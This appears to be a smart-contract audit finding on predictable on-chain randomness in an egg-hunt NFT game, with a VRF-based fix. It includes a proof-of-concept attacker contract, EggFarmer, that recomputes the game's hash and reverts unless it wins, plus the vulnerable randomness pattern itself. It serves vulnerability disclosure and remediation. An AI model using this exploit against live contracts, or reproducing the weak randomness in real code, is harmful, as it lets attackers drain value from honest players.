The game uses insecure pseudo-random number generation to determine whether a user finds an egg. This randomness is predictable and can be manipulated by attackers, especially in public or incentivized games.
The following line of code generates a random value:
Every input to that hash is either public or attacker-influenced, so the "random" value is computable before the transaction is mined:
block.timestamp is chosen by the block proposer (miner or validator) and can be shifted within the bounds the network accepts; it is also known to anyone simulating the call in the current block.
block.prevrandao (formerly block.difficulty) is the beacon-chain RANDAO value; under PoS a proposer can bias it by withholding a block, and it is already fixed and public for the block in which the call lands.
msg.sender and eggCounter are fully known: the caller picks msg.sender (an EOA or a purpose-built contract), and eggCounter is public contract state.
A malicious actor does not need to control any of these inputs. They can simulate the call off-chain (for example with eth_call against the pending block) and only submit when the result is an egg, or wrap the call in a contract that recomputes the same hash and reverts unless an egg will be found, so that losing attempts never change state and cost only the gas of a revert.
Attackers can therefore farm eggs deterministically, bypassing the intended randomness entirely.
Impact: NFT inflation, an unfair advantage over honest players, and loss of game integrity; the more the eggs are worth, the more this is worth automating.
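The attack described above, as an added example that is not the contest project's code. The EggHunt contract is a hypothetical reconstruction of the vulnerable pattern (the exact hash inputs, their order and the 1-in-10 odds are assumptions, since the page does not reproduce the original line); EggFarmer is the attacker's wrapper, which recomputes the same hash with its own address as msg.sender and reverts whenever the call would not yield an egg.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

/// Hypothetical reconstruction of the vulnerable game logic (assumption:
/// formula, input order and ODDS are not taken from the original contract).
contract EggHunt {
    uint256 public eggCounter;
    mapping(address => uint256) public eggs;
    uint256 public constant ODDS = 10; // 1 in 10 calls finds an egg

    function findEgg() external returns (bool found) {
        // Every input here is public or attacker-chosen before mining.
        uint256 r = uint256(
            keccak256(abi.encodePacked(block.timestamp, block.prevrandao, msg.sender, eggCounter))
        );
        if (r % ODDS == 0) {
            eggs[msg.sender] += 1;
            found = true;
        }
        eggCounter += 1;
    }
}

/// Attacker wrapper: only pays for a state-changing call when it will win.
/// Run farm() repeatedly (one tx per block, or from several addresses);
/// losing blocks revert cheaply, winning blocks always mint an egg.
contract EggFarmer {
    EggHunt public immutable hunt;

    constructor(EggHunt _hunt) {
        hunt = _hunt;
    }

    function farm() external {
        // Inside hunt.findEgg(), msg.sender is this contract, so the attacker
        // can reproduce the exact preimage the game will hash in this block.
        uint256 r = uint256(
            keccak256(
                abi.encodePacked(block.timestamp, block.prevrandao, address(this), hunt.eggCounter())
            )
        );
        require(r % hunt.ODDS() == 0, "no egg this block; revert and retry");

        bool found = hunt.findEgg();
        require(found, "prediction mismatch"); // defensive: formula drifted from assumption
    }
}
```

The same prediction can be made without any contract at all: an eth_call against the pending block returns the outcome for a given sender, and the attacker simply withholds the real transaction until it would win. Note that a check such as `msg.sender == tx.origin` would stop the contract wrapper but not the off-chain simulation.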
Manual code review
Solidity documentation on randomness
Common blockchain attack patterns
Use a verifiable random function (VRF), such as Chainlink VRF, so that the random value is produced off-chain by an oracle, proven on-chain, and not known to anyone when the player commits to the attempt:
Request randomness via Chainlink when the player calls the egg-finding function, recording who made the request.
Handle fulfillment in the asynchronous callback, which the VRF coordinator (not the player) invokes, and mint the egg there. Because the player's transaction has already completed before the random word exists, there is nothing to simulate and no way to revert a losing outcome.
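One way to implement the two steps above, as an added example rather than the project's or Chainlink's own code. It uses the Chainlink VRF v2 consumer interface; the import paths follow the @chainlink/contracts v0.8 package layout (an assumption, since that layout has moved between package versions), and the key hash, subscription ID, gas limit, confirmation count and the 1-in-10 odds are deployment-specific placeholders.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Assumption: import paths as in the @chainlink/contracts v0.8 package.
import {VRFCoordinatorV2Interface} from "@chainlink/contracts/src/v0.8/interfaces/VRFCoordinatorV2Interface.sol";
import {VRFConsumerBaseV2} from "@chainlink/contracts/src/v0.8/VRFConsumerBaseV2.sol";

/// Egg hunt whose outcome is decided by a VRF word the player cannot predict
/// or abort: the request tx commits, the coordinator's callback resolves.
contract EggHuntVRF is VRFConsumerBaseV2 {
    VRFCoordinatorV2Interface private immutable COORDINATOR;
    bytes32 private immutable keyHash;      // gas lane, per Chainlink docs for the network
    uint64 private immutable subId;         // funded VRF subscription owned by the deployer
    uint32 private constant CALLBACK_GAS = 200_000;
    uint16 private constant CONFIRMATIONS = 3;
    uint256 public constant ODDS = 10;      // assumption: 1 in 10 attempts finds an egg

    mapping(uint256 => address) public requestToPlayer; // requestId => player
    mapping(address => bool) public hasPending;          // one open attempt per player
    mapping(address => uint256) public eggs;

    event EggRequested(uint256 indexed requestId, address indexed player);
    event EggResult(uint256 indexed requestId, address indexed player, bool found);

    constructor(address coordinator, bytes32 _keyHash, uint64 _subId)
        VRFConsumerBaseV2(coordinator)
    {
        COORDINATOR = VRFCoordinatorV2Interface(coordinator);
        keyHash = _keyHash;
        subId = _subId;
    }

    /// Step 1: the player commits to an attempt. No randomness exists yet,
    /// so there is nothing to simulate and nothing to revert on.
    function findEgg() external returns (uint256 requestId) {
        require(!hasPending[msg.sender], "attempt already pending");
        hasPending[msg.sender] = true;
        requestId = COORDINATOR.requestRandomWords(
            keyHash, subId, CONFIRMATIONS, CALLBACK_GAS, 1 /* numWords */
        );
        requestToPlayer[requestId] = msg.sender;
        emit EggRequested(requestId, msg.sender);
    }

    /// Step 2: called only by the coordinator (VRFConsumerBaseV2.rawFulfillRandomWords
    /// checks the caller). Never revert here: VRF does not retry failed callbacks,
    /// so a revert would strand the player's attempt.
    function fulfillRandomWords(uint256 requestId, uint256[] memory randomWords) internal override {
        address player = requestToPlayer[requestId];
        if (player == address(0)) return; // unknown or already-handled request
        delete requestToPlayer[requestId];
        hasPending[player] = false;

        bool found = randomWords[0] % ODDS == 0;
        if (found) {
            eggs[player] += 1; // mint/credit the egg here, not in findEgg()
        }
        emit EggResult(requestId, player, found);
    }
}
```

Two details matter for the fix to hold: the egg must be credited in the callback, never in the request function, and the callback must be tolerant of bad state rather than reverting, because the coordinator will not re-deliver a failed fulfillment. The one-pending-attempt-per-player rule also keeps a player from queuing many requests and letting the coordinator's gas pay for them.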
Insecure methods to generate pseudo-random numbers